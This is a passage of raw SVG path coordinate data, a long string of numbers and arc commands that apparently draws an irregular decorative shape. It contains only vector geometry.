.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1